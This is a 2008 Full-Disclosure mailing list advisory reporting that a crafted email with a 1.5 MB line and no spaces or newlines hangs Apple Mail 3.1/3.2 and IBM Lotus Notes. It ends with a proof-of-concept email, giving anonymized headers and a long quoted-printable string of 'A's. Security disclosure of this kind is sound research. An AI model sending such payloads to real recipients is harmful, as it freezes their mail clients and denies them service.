[<prev] [next>] [day] [month] [year] [list]
Message-Id: <EB27A370-8013-4C37-AF64-709FEDE93D7B@davidwharton.us>
Date: Thu, 29 May 2008 19:31:39 -0500
From: David Wharton <security@...idwharton.us>
To: full-disclosure@...ts.grok.org.uk
Subject: Apple Mail Denial of Service Vulnerability (with
bonus IBM Lotus Notes DoS!)
***Summary***
A maliciously crafted e-mail message can cause a denial of service in
multiple versions of the Apple Mail email client.
***Scope***
Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)
Note: other versions of this product may be vulnerable as well; I have
not tested them. The vendor has been made aware of this issue and has
chosen not to treat it as a security issue.
Interestingly enough, a similar issue seems to be present in multiple
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z -- http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611)
. The exploit provided in this advisory will also cause a denial of
service condition on multiple versions of IBM Lotus Notes. IBM has
been kind enough to create SPR# PRAD7DPKLW to address the issue the
exploit targets.
***Description***
An email message with a maliciously crafted body (in my tests I used a
long line) can cause the e-mail client to hang, resulting in a denial
of service condition. Testing with emails that do not have any
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a line
consisting of 1.5 MB can cause the email clients to hang for over half
an hour.
Initial testing reveals the following:
In Apple Mail, the e-mail is rendered correctly in the preview pane
but a subsequent click on a different e-mail causes the application to
hang.
***Credits***
David Wharton
***References***
Apple Mail
http://www.apple.com/macosx/features/mail.html
***PoC Exploit***
Below is a sample e-mail with headers (some headers removed or
modified) that causes the e-mail clients to hang as discussed. Note
that the body is one long line and the "=" character is not part of;
it is there for formatting but in reality most of the body is one long
contiguous string of A's.
Subject: dos test
MIME-Version: 1.0
From: xxxxx@...xx.com
To: xxxxx@...xx.com
Date: xxxxx
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx@...xx.com>
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html;
charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx@...xx.com
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@
<font
size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
<snip> (removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</
font>N=
OTICE: This e-mail message and all attachments transmitted with it
may con=
tain confidential information intended solely for the use of the
addressee.=
<br />=
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists